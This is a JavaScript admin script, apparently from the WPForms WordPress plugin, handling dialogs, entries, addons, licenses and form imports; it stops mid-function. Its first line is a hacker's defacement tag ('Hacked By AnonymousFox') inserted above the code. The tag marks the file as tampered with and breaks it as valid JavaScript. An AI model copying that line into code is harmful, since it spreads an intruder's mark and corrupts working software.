Hacked By AnonymousFox
/* global wp, _, wpforms_admin, jconfirm, wpCookies, Choices, List */
;(function($) {
'use strict';
// Global settings access.
var s;
// Admin object.
var WPFormsAdmin = {
// Settings.
settings: {
iconActivate: '<i class="fa fa-toggle-on fa-flip-horizontal" aria-hidden="true"></i>',
iconDeactivate: '<i class="fa fa-toggle-on" aria-hidden="true"></i>',
iconInstall: '<i class="fa fa-cloud-download" aria-hidden="true"></i>',
iconSpinner: '<i class="fa fa-spinner fa-spin" aria-hidden="true"></i>',
mediaFrame: false
},
/**
* Start the engine.
*
* @since 1.3.9
*/
init: function() {
// Settings shortcut.
s = this.settings;
// Document ready.
$( document ).ready( WPFormsAdmin.ready );
// Forms Overview.
WPFormsAdmin.initFormOverview();
// Entries Single (Details).
WPFormsAdmin.initEntriesSingle();
// Entries List.
WPFormsAdmin.initEntriesList();
// Welcome activation.
WPFormsAdmin.initWelcome();
// Addons List.
WPFormsAdmin.initAddons();
// Settings.
WPFormsAdmin.initSettings();
// Tools.
WPFormsAdmin.initTools();
// Upgrades (Tools view).
WPFormsAdmin.initUpgrades();
},
/**
* Document ready.
*
* @since 1.3.9
*/
ready: function() {
// To prevent jumping (since WP core moves the notices with js),
// they are hidden initally with CSS, then revealed below with JS,
// which runs after they have been moved.
$( '.notice' ).show();
// If there are screen options we have to move them.
$( '#screen-meta-links, #screen-meta' ).prependTo( '#wpforms-header-temp' ).show();
// Init fancy selects via choices.js.
WPFormsAdmin.initChoicesJS();
// Init checkbox multiselects columns.
WPFormsAdmin.initCheckboxMultiselectColumns();
// Init colorpickers via minicolors.js.
$( '.wpforms-color-picker' ).minicolors();
// Init fancy File Uploads.
$( '.wpforms-file-upload' ).each( function(){
var $input = $( this ).find( 'input[type=file]' ),
$label = $( this ).find( 'label' ),
labelVal = $label.html();
$input.on( 'change', function( event ) {
var fileName = '';
if ( this.files && this.files.length > 1 ) {
fileName = ( this.getAttribute( 'data-multiple-caption' ) || '' ).replace( '{count}', this.files.length );
} else if( event.target.value ) {
fileName = event.target.value.split( '\\' ).pop();
}
if ( fileName ) {
$label.find( '.fld' ).html( fileName );
} else {
$label.html( labelVal );
}
});
// Firefox bug fix.
$input.on( 'focus', function(){ $input.addClass( 'has-focus' ); }).on( 'blur', function(){ $input.removeClass( 'has-focus' ); });
});
// jquery-confirm defaults.
jconfirm.defaults = {
closeIcon: true,
backgroundDismiss: true,
escapeKey: true,
animationBounce: 1,
useBootstrap: false,
theme: 'modern',
boxWidth: '400px',
animateFromElement: false
};
// Upgrade information modal for upgrade links.
$( document ).on( 'click', '.wpforms-upgrade-modal', function() {
$.alert({
title: false,
content: wpforms_admin.upgrade_modal,
icon: 'fa fa-info-circle',
type: 'blue',
boxWidth: '565px',
buttons: {
confirm: {
text: wpforms_admin.ok,
btnClass: 'btn-confirm',
keys: [ 'enter' ]
}
}
});
});
// Action available for each binding.
$( document ).trigger( 'wpformsReady' );
},
/**
* Initilize Choices JS elements.
*
* @since 1.4.2
*/
initChoicesJS: function() {
$( '.choicesjs-select' ).each( function() {
var $this = $( this ),
args = { searchEnabled: false };
if ( $this.attr( 'multiple' ) ) {
args.searchEnabled = true;
args.removeItemButton = true;
}
if ( $this.data( 'placeholder' ) ) {
args.placeholderValue = $this.data( 'placeholder' );
}
if ( $this.data( 'sorting' ) === 'off' ) {
args.shouldSort = false;
}
if ( $this.data( 'search' ) ) {
args.searchEnabled = true;
}
new Choices( $this[0], args );
});
},
/**
* Initilize checkbox mulit-select columns.
*
* @since 1.4.2
*/
initCheckboxMultiselectColumns: function() {
$( document ).on( 'change', '.checkbox-multiselect-columns input', function() {
var $this = $( this ),
$parent = $this.parent(),
$container = $this.closest( '.checkbox-multiselect-columns' ),
label = $parent.text(),
itemID = 'check-item-' + $this.val(),
$item = $container.find( '#' + itemID );
if ( $this.prop( 'checked' ) ) {
$this.parent().addClass( 'checked' );
if ( ! $item.length ) {
$container.find('.second-column ul').append( '<li id="'+itemID+'">'+label+'</li>' );
}
} else {
$this.parent().removeClass( 'checked' );
$container.find( '#' + itemID ).remove();
}
});
$( document ).on( 'click', '.checkbox-multiselect-columns .all', function( event ) {
event.preventDefault();
$( this ).closest( '.checkbox-multiselect-columns' ).find( 'input[type=checkbox]' ).prop( 'checked', true ).trigger( 'change' );
$( this ).remove();
});
},
//--------------------------------------------------------------------//
// Forms Overview
//--------------------------------------------------------------------//
/**
* Element bindings for Form Overview page.
*
* @since 1.3.9
*/
initFormOverview: function() {
// Confirm form entry deletion and duplications.
$( document ).on( 'click', '#wpforms-overview .wp-list-table .delete a, #wpforms-overview .wp-list-table .duplicate a', function( event ) {
event.preventDefault();
var url = $( this ).attr( 'href' ),
msg = $( this ).parent().hasClass( 'delete' ) ? wpforms_admin.form_delete_confirm : wpforms_admin.form_duplicate_confirm;
// Trigger alert modal to confirm.
$.confirm({
title: false,
content: msg,
backgroundDismiss: false,
closeIcon: false,
icon: 'fa fa-exclamation-circle',
type: 'orange',
buttons: {
confirm: {
text: wpforms_admin.ok,
btnClass: 'btn-confirm',
keys: [ 'enter' ],
action: function(){
window.location = url;
}
},
cancel: {
text: wpforms_admin.cancel,
keys: [ 'esc' ]
}
}
});
});
},
//--------------------------------------------------------------------//
// Entry Single (Details)
//--------------------------------------------------------------------//
/**
* Element bindings for Entries Single (Details) page.
*
* @since 1.3.9
*/
initEntriesSingle: function() {
// Entry navigation hotkeys.
// We only want to listen on the applicable admin page.
if ( 'wpforms-entries' === WPFormsAdmin.getQueryString( 'page' ) && 'details' === WPFormsAdmin.getQueryString( 'view' ) ) {
WPFormsAdmin.entryHotkeys();
}
// Confirm entry deletion.
$( document ).on( 'click', '#wpforms-entries-single .submitdelete', function( event ) {
event.preventDefault();
var url = $( this ).attr( 'href' );
// Trigger alert modal to confirm.
$.confirm({
title: false,
content: wpforms_admin.entry_delete_confirm,
backgroundDismiss: false,
closeIcon: false,
icon: 'fa fa-exclamation-circle',
type: 'orange',
buttons: {
confirm: {
text: wpforms_admin.ok,
btnClass: 'btn-confirm',
keys: [ 'enter' ],
action: function(){
window.location = url;
}
},
cancel: {
text: wpforms_admin.cancel,
keys: [ 'esc' ]
}
}
});
});
// Open Print preview in new window.
$( document ).on( 'click', '#wpforms-entries-single .wpforms-entry-print a', function( event ) {
event.preventDefault();
window.open( $( this ).attr( 'href' ) );
});
// Toggle displaying empty fields.
$( document ).on( 'click', '#wpforms-entries-single .wpforms-empty-field-toggle', function( event ) {
event.preventDefault();
// Handle cookie.
if ( wpCookies.get( 'wpforms_entry_hide_empty' ) === 'true') {
// User was hiding empty fields, so now display them.
wpCookies.remove('wpforms_entry_hide_empty');
$( this ).text( wpforms_admin.entry_empty_fields_hide );
} else {
// User was seeing empty fields, so now hide them.
wpCookies.set( 'wpforms_entry_hide_empty', 'true', 2592000 ); // 1month.
$( this ).text( wpforms_admin.entry_empty_fields_show );
}
$( '.wpforms-entry-field.empty' ).toggle();
});
// Display notes editor.
$( document ).on( 'click', '#wpforms-entries-single .wpforms-entry-notes-new .add', function( event ) {
event.preventDefault();
$( this ).hide().next( 'form' ).slideToggle();
});
// Cancel note.
$( document ).on( 'click', '#wpforms-entries-single .wpforms-entry-notes-new .cancel', function( event ) {
event.preventDefault();
$( this ).closest( 'form' ).slideToggle();
$('.wpforms-entry-notes-new .add').show();
});
// Delete note.
$( document ).on( 'click', '#wpforms-entries-single .wpforms-entry-notes-byline .note-delete', function( event ) {
event.preventDefault();
var url = $( this ).attr( 'href' );
// Trigger alert modal to confirm.
$.confirm({
title: false,
content: wpforms_admin.entry_note_delete_confirm,
backgroundDismiss: false,
closeIcon: false,
icon: 'fa fa-exclamation-circle',
type: 'orange',
buttons: {
confirm: {
text: wpforms_admin.ok,
btnClass: 'btn-confirm',
keys: [ 'enter' ],
action: function(){
window.location = url;
}
},
cancel: {
text: wpforms_admin.cancel,
keys: [ 'esc' ]
}
}
});
});
},
/**
* Hotkeys for Entries Single (Details) page.
*
* j triggers previous entry, k triggers next entry.
*
* @since 1.4.0
*/
entryHotkeys: function() {
$( document ).keydown( function( event ) {
if ( 74 === event.keyCode && ! WPFormsAdmin.isFormTypeNode( event.target.nodeName ) ) {
// j key has been pressed outside of a form element, go to
// the previous entry.
var prevEntry = $('#wpforms-entry-prev-link').attr( 'href' );
if ( '#' !== prevEntry ) {
window.location.href = prevEntry;
}
} else if ( 75 === event.keyCode && ! WPFormsAdmin.isFormTypeNode( event.target.nodeName ) ) {
// k key has been pressed outside of a form element, go to
// the previous entry.
var nextEntry = $('#wpforms-entry-next-link').attr( 'href' );
if ( '#' !== nextEntry ) {
window.location.href = nextEntry;
}
}
});
},
//--------------------------------------------------------------------//
// Entry List
//--------------------------------------------------------------------//
/**
* Element bindings for Entries List table page.
*
* @since 1.3.9
*/
initEntriesList: function() {
$( document ).on( 'click', '#wpforms-entries-table-edit-columns', function( event ) {
event.preventDefault();
WPFormsAdmin.entriesListFieldColumn();
});
// Toogle form selector dropdown.
$( document ).on( 'click', '#wpforms-entries-list .form-selector .toggle', function( event ) {
event.preventDefault();
$( this ).toggleClass( 'active' ).next( '.form-list' ).toggle();
});
// Confirm entry deletion.
$( document ).on( 'click', '#wpforms-entries-list .wp-list-table .delete', function( event ) {
event.preventDefault();
var url = $( this ).attr( 'href' );
// Trigger alert modal to confirm.
$.confirm({
title: false,
content: wpforms_admin.entry_delete_confirm,
backgroundDismiss: false,
closeIcon: false,
icon: 'fa fa-exclamation-circle',
type: 'orange',
buttons: {
confirm: {
text: wpforms_admin.ok,
btnClass: 'btn-confirm',
keys: [ 'enter' ],
action: function(){
window.location = url;
}
},
cancel: {
text: wpforms_admin.cancel,
keys: [ 'esc' ]
}
}
});
});
// Toggle entry stars.
$( document ).on( 'click', '#wpforms-entries-list .wp-list-table .indicator-star', function( event ) {
event.preventDefault();
var $this = $( this ),
task = '',
total = Number( $( '#wpforms-entries-list .starred-num' ).text() ),
id = $this.data( 'id' );
if ( $this.hasClass( 'star' ) ) {
task = 'star';
total++;
$this.attr( 'title', wpforms_admin.entry_unstar );
} else {
task = 'unstar';
total--;
$this.attr( 'title', wpforms_admin.entry_star );
}
$this.toggleClass( 'star unstar' );
$( '#wpforms-entries-list .starred-num' ).text( total );
var data = {
task : task,
action : 'wpforms_entry_list_star',
nonce : wpforms_admin.nonce,
entry_id: id
};
$.post( wpforms_admin.ajax_url, data );
});
// Toggle entry read state.
$( document ).on( 'click', '#wpforms-entries-list .wp-list-table .indicator-read', function( event ) {
event.preventDefault();
var $this = $( this ),
task = '',
total = Number( $( '#wpforms-entries-list .unread-num' ).text() ),
id = $this.data( 'id' );
if ( $this.hasClass( 'read' ) ) {
task = 'read';
total--;
$this.attr( 'title', wpforms_admin.entry_unread );
} else {
task = 'unread';
total++;
$this.attr( 'title', wpforms_admin.entry_read );
}
$this.toggleClass( 'read unread' );
$( '#wpforms-entries-list .unread-num' ).text( total );
var data = {
task : task,
action : 'wpforms_entry_list_read',
nonce : wpforms_admin.nonce,
entry_id: id
};
$.post( wpforms_admin.ajax_url, data );
});
// Confirm mass entry deletion - this deletes ALL entries.
$( document ).on( 'click', '#wpforms-entries-list .form-details-actions-deleteall', function( event ) {
event.preventDefault();
var url = $( this ).attr( 'href' );
// Trigger alert modal to confirm.
$.confirm({
title: wpforms_admin.heads_up,
content: wpforms_admin.entry_delete_all_confirm,
backgroundDismiss: false,
closeIcon: false,
icon: 'fa fa-exclamation-circle',
type: 'orange',
buttons: {
confirm: {
text: wpforms_admin.ok,
btnClass: 'btn-confirm',
keys: [ 'enter' ],
action: function(){
window.location = url;
}
},
cancel: {
text: wpforms_admin.cancel,
keys: [ 'esc' ]
}
}
});
});
},
/**
* Display settings to change the entry list field columns/
*
* @since 1.4.0
*/
entriesListFieldColumn: function() {
$.alert({
title: wpforms_admin.entry_field_columns,
boxWidth: '500px',
content: s.iconSpinner + $( '#wpforms-field-column-select' ).html(),
onContentReady: function() {
var $modalContent = this.$content,
$select = $modalContent.find( 'select' ),
choices = new Choices( $select[0], {
maxItemCount: 5,
placeholderValue: wpforms_admin.fields_select+'...',
removeItemButton: true,
shouldSort: false,
callbackOnInit: function() {
$modalContent.find( '.fa' ).remove();
$modalContent.find( 'form' ).show();
}
});
$( '.jconfirm-content-pane, .jconfirm-box' ).css( 'overflow','visible' );
choices.passedElement.addEventListener( 'change', function() {
choices.hideDropdown();
}, false );
},
buttons: {
confirm: {
text: wpforms_admin.save_refresh,
btnClass: 'btn-confirm',
keys: ['enter'],
action: function() {
this.$content.find( 'form' ).submit();
}
},
cancel: {
text: wpforms_admin.cancel,
keys: [ 'esc' ]
}
}
});
},
//--------------------------------------------------------------------//
// Welcome Activation.
//--------------------------------------------------------------------//
/**
* Welcome activation page.
*
* @since 1.3.9
*/
initWelcome: function() {
// Open modal and play How To video.
$( document ).on( 'click', '#wpforms-welcome .play-video', function( event ) {
event.preventDefault();
var video = '<div class="video-container"><iframe width="1280" height="720" src="https://www.youtube-nocookie.com/embed/yDyvSGV7tP4?rel=0&showinfo=0&autoplay=1" frameborder="0" allowfullscreen></iframe></div>';
$.dialog({
title: false,
content: video,
closeIcon: true,
boxWidth: '70%'
});
});
},
//--------------------------------------------------------------------//
// Addons List.
//--------------------------------------------------------------------//
/**
* Element bindings for Addons List page.
*
* @since 1.3.9
*/
initAddons: function() {
// Some actions have to be delayed to document.ready.
$( document ).on( 'wpformsReady', function() {
// Only run on the addons page.
if ( $( '#wpforms-admin-addons' ).length ) {
// Display all addon boxes as the same height.
$( '.addon-item .details' ).matchHeight( { byrow: false, property: 'height' } );
// Addons searching.
var addonSearch = new List('wpforms-admin-addons-list', {
valueNames: [ 'addon-name' ]
});
$( '#wpforms-admin-addons-search' ).on( 'keyup', function() {
addonSearch.search( $( this ).val() );
});
}
});
// Display all addon boxes as the same height.
$( document ).on( 'wpformsReady', function() {
// Only run on the addons page because the matchHeight jQuery
// library is not loaded globally.
if ( $( '#wpforms-admin-addons' ).length ) {
$( '.addon-item .details' ).matchHeight( { byrow: false, property: 'min-height' } );
}
});
// Toogle an addon state.
$( document ).on( 'click', '#wpforms-admin-addons .addon-item button', function( event ) {
event.preventDefault();
WPFormsAdmin.addonToggle( $( this ) );
});
},
/**
* Toggle addon state.
*
* @since 1.3.9
*/
addonToggle: function( el ) {
var $this = $( el ),
$addon = $this.closest( '.addon-item' ),
plugin = $this.attr( 'data-plugin' ),
action,
cssClass,
statusText,
buttonText,
errorText,
successText;
$this.prop( 'disabled', true ).addClass( 'loading' );
$this.html( s.iconSpinner );
if ( $this.hasClass( 'status-active' ) ) {
// Deactivate.
action = 'wpforms_deactivate_addon';
cssClass = 'status-inactive';
statusText = wpforms_admin.addon_inactive;
buttonText = s.iconActivate + wpforms_admin.addon_activate;
errorText = s.iconDeactivate + wpforms_admin.addon_deactivate;
} else if ( $this.hasClass( 'status-inactive' ) ) {
// Activate.
action = 'wpforms_activate_addon';
cssClass = 'status-active';
statusText = wpforms_admin.addon_active;
buttonText = s.iconDeactivate + wpforms_admin.addon_deactivate;
errorText = s.iconActivate + wpforms_admin.addon_activate;
} else if ( $this.hasClass( 'status-download' ) ) {
// Install.
action = 'wpforms_install_addon';
cssClass = 'status-inactive';
statusText = wpforms_admin.addon_inactive;
buttonText = s.iconActivate + wpforms_admin.addon_activate;
errorText = s.iconInstall + wpforms_admin.addon_install;
} else {
return;
}
var data = {
action: action,
nonce : wpforms_admin.nonce,
plugin: plugin
};
$.post( wpforms_admin.ajax_url, data, function( res ) {
if ( res.success ){
if ( 'wpforms_install_addon' === action ) {
$this.attr( 'data-plugin', res.data.basename );
successText = res.data.msg;
} else {
successText = res.data;
}
$addon.find( '.actions' ).append( '<div class="msg success">'+successText+'</div>' );
$addon.find( 'span.status-label' ).removeClass( 'status-active status-inactive status-download' ).addClass( cssClass ).text( statusText );
$this.removeClass( 'status-active status-inactive status-download' ).addClass( cssClass ).html( buttonText );
} else {
if ( 'download_failed' === res.data[0].code ) {
$addon.find( '.actions' ).append( '<div class="msg error">'+wpforms_admin.addon_error+'</div>' );
} else {
$addon.find( '.actions' ).append( '<div class="msg error">'+res.data+'</div>' );
}
$this.html( errorText );
}
$this.prop( 'disabled', false ).removeClass( 'loading' );
// Automatically clear addon messages after 3 seconds.
setTimeout( function() {
$( '.addon-item .msg' ).remove();
}, 3000 );
}).fail( function( xhr ) {
console.log( xhr.responseText );
});
},
//--------------------------------------------------------------------//
// Settings.
//--------------------------------------------------------------------//
/**
* Element bindings for Settings page.
*
* @since 1.3.9
*/
initSettings: function() {
// On ready events.
$( document ).on( 'wpformsReady', function() {
// Only proceed if we're on the settings page.
if ( ! $( '#wpforms-settings' ).length ) {
return;
}
// Watch for hashes and scroll to if found.
// Display all addon boxes as the same height.
var integrationFocus = WPFormsAdmin.getQueryString( 'wpforms-integration' ),
jumpTo = WPFormsAdmin.getQueryString( 'jump' );
if ( integrationFocus ) {
$( 'body' ).animate({
scrollTop: $( '#wpforms-integration-'+integrationFocus ).offset().top
}, 1000 );
} else if ( jumpTo ) {
$( 'body' ).animate({
scrollTop: $( '#'+jumpTo ).offset().top
}, 1000 );
}
// Settings conditional logic.
$( '.wpforms-admin-settings-form' ).conditions( [
// Misc > Disable User Cookies visibility.
{
conditions: {
element: '#wpforms-setting-gdpr',
type: 'checked',
operator: 'is'
},
actions: {
if: {
element: '#wpforms-setting-row-gdpr-disable-uuid,#wpforms-setting-row-gdpr-disable-details',
action: 'show'
},
else : {
element: '#wpforms-setting-row-gdpr-disable-uuid,#wpforms-setting-row-gdpr-disable-details',
action: 'hide'
}
},
effect: 'appear'
}
] );
});
// Image upload fields.
$( document ).on( 'click', '.wpforms-setting-row-image button', function( event ) {
event.preventDefault();
WPFormsAdmin.imageUploadModal( $( this ) );
});
// Verify license key.
$( document ).on( 'click', '#wpforms-setting-license-key-verify', function( event ) {
event.preventDefault();
WPFormsAdmin.licenseVerify( $( this ) );
});
// Deactivate license key.
$( document ).on( 'click', '#wpforms-setting-license-key-deactivate', function( event ) {
event.preventDefault();
WPFormsAdmin.licenseDeactivate( $( this ) );
});
// Refresh license key.
$( document ).on( 'click', '#wpforms-setting-license-key-refresh', function( event ) {
event.preventDefault();
WPFormsAdmin.licenseRefresh( $( this ) );
});
/**
* @todo Refactor providers settings tab. Code below is legacy.
*/
// Integration connect.
$( document ).on( 'click', '.wpforms-settings-provider-connect', function( event ) {
event.preventDefault();
WPFormsAdmin.integrationConnect( $( this ) );
});
// Integration account disconnect.
$( document ).on( 'click', '.wpforms-settings-provider-accounts-list a', function( event ) {
event.preventDefault();
WPFormsAdmin.integrationDisconnect( $( this ) );
});
// Integration individual display toggling.
$( document ).on( 'click', '.wpforms-settings-provider-header', function( event ) {
event.preventDefault();
$( this ).parent().find( '.wpforms-settings-provider-accounts' ).slideToggle();
$( this ).parent().find( '.wpforms-settings-provider-logo i' ).toggleClass( 'fa-chevron-right fa-chevron-down' );
});
// Integration accounts display toggling.
$( document ).on( 'click', '.wpforms-settings-provider-accounts-toggle a', function( event ) {
event.preventDefault();
var $connectFields = $( this ).parent().next( '.wpforms-settings-provider-accounts-connect' );
$connectFields.find( 'input[type=text], input[type=password]' ).val('');
$connectFields.slideToggle();
});
},
/**
* Image upload modal window.
*
* @since 1.3.0
*/
imageUploadModal: function( el ) {
if ( s.media_frame ) {
s.media_frame.open();
return;
}
var $setting = $( el ).closest( '.wpforms-setting-field' );
s.media_frame = wp.media.frames.wpforms_media_frame = wp.media({
className: 'media-frame wpforms-media-frame',
frame: 'select',
multiple: false,
title: wpforms_admin.upload_image_title,
library: {
type: 'image'
},
button: {
text: wpforms_admin.upload_image_button
}
});
s.media_frame.on( 'select', function(){
// Grab our attachment selection and construct a JSON representation of the model.
var media_attachment = s.media_frame.state().get( 'selection' ).first().toJSON();
// Send the attachment URL to our custom input field via jQuery.
$setting.find( 'input[type=text]' ).val( media_attachment.url );
$setting.find( 'img' ).remove();
$setting.prepend( '<img src="'+media_attachment.url+'">' );
});
// Now that everything has been set, let's open up the frame.
s.media_frame.open();
},
/**
* Verify a license key.
*
* @since 1.3.9
*/
licenseVerify: function( el ) {
var $this = $( el ),
$row = $this.closest( '.wpforms-setting-row' ),
buttonWidth = $this.outerWidth(),
buttonLabel = $this.text(),
data = {
action: 'wpforms_verify_license',
nonce: wpforms_admin.nonce,
license: $('#wpforms-setting-license-key').val()
};
$this.html( s.iconSpinner ).css( 'width', buttonWidth ).prop( 'disabled', true );
$.post( wpforms_admin.ajax_url, data, function( res ) {
var icon = 'fa fa-check-circle',
color = 'green',
msg;
if ( res.success ){
msg = res.data.msg;
$row.find( '.type, .desc, #wpforms-setting-license-key-deactivate' ).show();
$row.find( '.type strong' ).text( res.data.type );
$('.wpforms-license-notice').remove();
} else {
icon = 'fa fa-exclamation-circle';
color = 'orange';
msg = res.data;
$row.find( '.type, .desc, #wpforms-setting-license-key-deactivate' ).hide();
}
$.alert({
title: false,
content: msg,
icon: icon,
type: color,
buttons: {
confirm: {
text: wpforms_admin.ok,
btnClass: 'btn-confirm',
keys: [ 'enter' ]
}
}
});
$this.html( buttonLabel ).css( 'width', 'auto' ).prop( 'disabled', false );
}).fail( function( xhr ) {
console.log( xhr.responseText );
});
},
/**
* Verify a license key.
*
* @since 1.3.9
*/
licenseDeactivate: function( el ) {
var $this = $( el ),
$row = $this.closest( '.wpforms-setting-row' ),
buttonWidth = $this.outerWidth(),
buttonLabel = $this.text(),
data = {
action: 'wpforms_deactivate_license',
nonce: wpforms_admin.nonce
};
$this.html( s.iconSpinner ).css( 'width', buttonWidth ).prop( 'disabled', true );
$.post( wpforms_admin.ajax_url, data, function( res ) {
var icon = 'fa fa-info-circle',
color = 'blue',
msg = res.data;
if ( res.success ){
$row.find( '#wpforms-setting-license-key' ).val('');
$row.find( '.type, .desc, #wpforms-setting-license-key-deactivate' ).hide();
} else {
icon = 'fa fa-exclamation-circle';
color = 'orange';
}
$.alert({
title: false,
content: msg,
icon: icon,
type: color,
buttons: {
confirm: {
text: wpforms_admin.ok,
btnClass: 'btn-confirm',
keys: [ 'enter' ]
}
}
});
$this.html( buttonLabel ).css( 'width', 'auto' ).prop( 'disabled', false );
}).fail( function( xhr ) {
console.log( xhr.responseText );
});
},
/**
* Refresh a license key.
*
* @since 1.3.9
*/
licenseRefresh: function( el ) {
var $this = $( el ),
$row = $this.closest( '.wpforms-setting-row' ),
data = {
action: 'wpforms_refresh_license',
nonce: wpforms_admin.nonce,
license: $('#wpforms-setting-license-key').val()
};
$.post( wpforms_admin.ajax_url, data, function( res ) {
var icon = 'fa fa-check-circle',
color = 'green',
msg;
if ( res.success ){
msg = res.data.msg;
$row.find( '.type strong' ).text( res.data.type );
} else {
icon = 'fa fa-exclamation-circle';
color = 'orange';
msg = res.data;
$row.find( '.type, .desc, #wpforms-setting-license-key-deactivate' ).hide();
}
$.alert({
title: false,
content: msg,
icon: icon,
type: color,
buttons: {
confirm: {
text: wpforms_admin.ok,
btnClass: 'btn-confirm',
keys: [ 'enter' ]
}
}
});
}).fail( function( xhr ) {
console.log( xhr.responseText );
});
},
/**
* Connect integration provider account.
*
* @since 1.3.9
*/
integrationConnect: function( el ) {
var $this = $( el ),
buttonWidth = $this.outerWidth(),
buttonLabel = $this.text(),
$provider = $this.closest( '.wpforms-settings-provider' ),
data = {
action : 'wpforms_settings_provider_add',
data : $this.closest( 'form' ).serialize(),
provider: $this.data( 'provider' ),
nonce : wpforms_admin.nonce
};
$this.html( 'Connecting...' ).css( 'width', buttonWidth ).prop( 'disabled', true );
$.post( wpforms_admin.ajax_url, data, function( res ) {
if ( res.success ){
$provider.find( '.wpforms-settings-provider-accounts-list ul' ).append( res.data.html );
$provider.addClass( 'connected' );
$this.closest( '.wpforms-settings-provider-accounts-connect' ).slideToggle();
} else {
var msg = wpforms_admin.provider_auth_error;
if ( res.data.error_msg ) {
msg += "\n" + res.data.error_msg; // jshint ignore:line
}
$.alert({
title: false,
content: msg,
icon: 'fa fa-exclamation-circle',
type: 'orange',
buttons: {
confirm: {
text: wpforms_admin.ok,
btnClass: 'btn-confirm',
keys: [ 'enter' ]
}
}
});
console.log(res);
}
$this.html( buttonLabel ).css( 'width', 'auto' ).prop( 'disabled', false );
}).fail( function( xhr ) {
console.log( xhr.responseText );
});
},
/**
* Remove integration provider account.
*
* @since 1.3.9
*/
integrationDisconnect: function( el ) {
var $this = $( el ),
data = {
action : 'wpforms_settings_provider_disconnect',
provider: $this.data( 'provider' ),
key : $this.data( 'key'),
nonce : wpforms_admin.nonce
};
$.confirm({
title: wpforms_admin.heads_up,
content: wpforms_admin.provider_delete_confirm,
backgroundDismiss: false,
closeIcon: false,
icon: 'fa fa-exclamation-circle',
type: 'orange',
buttons: {
confirm: {
text: wpforms_admin.ok,
btnClass: 'btn-confirm',
keys: [ 'enter' ],
action: function(){
$.post( wpforms_admin.ajax_url, data, function( res ) {
if ( res.success ){
$this.parent().parent().remove();
} else {
console.log( res );
}
}).fail( function( xhr ) {
console.log( xhr.responseText );
});
}
},
cancel: {
text: wpforms_admin.cancel,
keys: [ 'esc' ]
}
}
});
},
//--------------------------------------------------------------------//
// Tools.
//--------------------------------------------------------------------//
/**
* Element bindings for Tools page.
*
* @since 1.4.2
*/
initTools: function() {
// Run import for a specific provider.
$( document ).on( 'click', '#wpforms-ssl-verify', function( event ) {
event.preventDefault();
WPFormsAdmin.verifySSLConnection();
});
// Run import for a specific provider.
$( document ).on( 'click', '#wpforms-importer-forms-submit', function( event ) {
event.preventDefault();
// Check to confirm user as selected a form.
if ( $( '#wpforms-importer-forms input:checked' ).length ) {
var ids = [];
$( '#wpforms-importer-forms input:checked' ).each( function ( i ) {
ids[i] = $( this ).val();
});
if ( ! wpforms_admin.isPro ) {
// We need to analyze the forms before starting the
// actual import.
WPFormsAdmin.analyzeForms( ids );
} else {
// Begin the import process.
WPFormsAdmin.importForms( ids );
}
} else {
// User didn't actually select a form so alert them.
$.alert({
title: false,
content: wpforms_admin.importer_forms_required,
icon: 'fa fa-info-circle',
type: 'blue',
buttons: {
confirm: {
text: wpforms_admin.ok,
btnClass: 'btn-confirm',
keys: [ 'enter' ]
}
}
});
}
});
// Continue import after analyzing.
$( document ).on( 'click', '#wpforms-importer-continue-submit', function( event ) {
event.preventDefault();
WPFormsAdmin.importForms( s.formIDs );
});
},
/**
* Perform test connection to verify that the current web host
* can successfully make outbound SSL connections.
*
* @since 1.4.5
*/
verifySSLConnection: function() {
var $btn = $( '#wpforms-ssl-verify' ),
btnLabel = $btn.text(),
btnWidth = $btn.outerWidth(),
$settings = $btn.parent(),
data = {
action: 'wpforms_verify_ssl',
nonce: wpforms_admin.nonce
};
$btn.css( 'width', btnWidth ).prop( 'disabled', true ).text( wpforms_admin.testing );
// Trigger AJAX to test connection
$.post( wpforms_admin.ajax_url, data, function( res ) {
console.log( res );
// Remove any previous alerts.
$settings.find( '.wpforms-alert, .wpforms-ssl-error' ).remove();
if ( res.success ){
$btn.before( '<div class="wpforms-alert wpforms-alert-success">' + res.data.msg + '</div>' );
} else {
$btn.before( '<div class="wpforms-alert wpforms-alert-danger">' + res.data.msg + '</div>' );
$btn.before( '<div class="wpforms-ssl-error pre-error">' + res.data.debug + '</div>' );
}
$btn.css( 'width', btnWidth ).prop( 'disabled', false ).text( btnLabel );
});
},
/**
* Begins the process of analyzing the forms.
*
* This runs for non-Pro installs to check if any of the forms to be
* imported contain fields
* not currently available.
*
* @since 1.4.2
*/
analyzeForms: function( forms ) {
var $processAnalyze = $( '#wpforms-importer-analyze' );
// Display total number of forms we have to import.
$processAnalyze.find( '.form-total' ).text( forms.length );
$processAnalyze.find( '.form-current' ).text( '1' );
// Hide the form select section.
$( '#wpforms-importer-forms' ).hide();
// Show Analyze status.
$processAnalyze.show();
// Create global analyze queue.
s.analyzeQueue = forms;
s.analyzed = 0;
s.analyzeUpgrade = [];
s.formIDs = forms;
// Analyze the first form in the queue.
WPFormsAdmin.analyzeForm();
},
/**
* Analyze a single form from the queue.
*
* @since 1.4.2
*/
analyzeForm: function() {
var $analyzeSettings = $( '#wpforms-importer-analyze' ),
formID = _.first( s.analyzeQueue ),
provider = WPFormsAdmin.getQueryString( 'provider' ),
data = {
action: 'wpforms_import_form_' + provider,
analyze: 1,
form_id: formID,
nonce: wpforms_admin.nonce
};
// Trigger AJAX analyze for this form.
$.post( wpforms_admin.ajax_url, data, function( res ) {
if ( res.success ){
if ( ! _.isEmpty( res.data.upgrade_plain ) || ! _.isEmpty( res.data.upgrade_omit ) ) {
s.analyzeUpgrade.push({
name: res.data.name,
fields: _.union( res.data.upgrade_omit, res.data.upgrade_plain )
});
}
// Remove this form ID from the queue.
s.analyzeQueue = _.without( s.analyzeQueue, formID );
s.analyzed++;
if ( _.isEmpty( s.analyzeQueue ) ) {
if ( _.isEmpty( s.analyzeUpgrade ) ) {
// Continue to import forms as no Pro fields were
// found.
WPFormsAdmin.importForms( s.formIDs );
} else {
// We found Pro fields, so alert the user.
var upgradeDetails = wp.template( 'wpforms-importer-upgrade' );
$analyzeSettings.find( '.upgrade' ).append( upgradeDetails( s.analyzeUpgrade ) );
$analyzeSettings.find( '.upgrade' ).show();
$analyzeSettings.find( '.process-analyze' ).hide();
}
} else {
// Analyze next form in the queue.
$analyzeSettings.find( '.form-current' ).text( s.analyzed+1 );
WPFormsAdmin.analyzeForm();
}
}
});
},
/**
* Begins the process of importing the forms.
*
* @since 1.4.2
*/
importForms: function( forms ) {
var $processSettings = $( '#wpforms-importer-process' );
// Display total number of forms we have to import.
$processSettings.find( '.form-total' ).text( forms.length );
$processSettings.find( '.form-current' ).text( '1' );
// Hide the form select and form analyze sections.
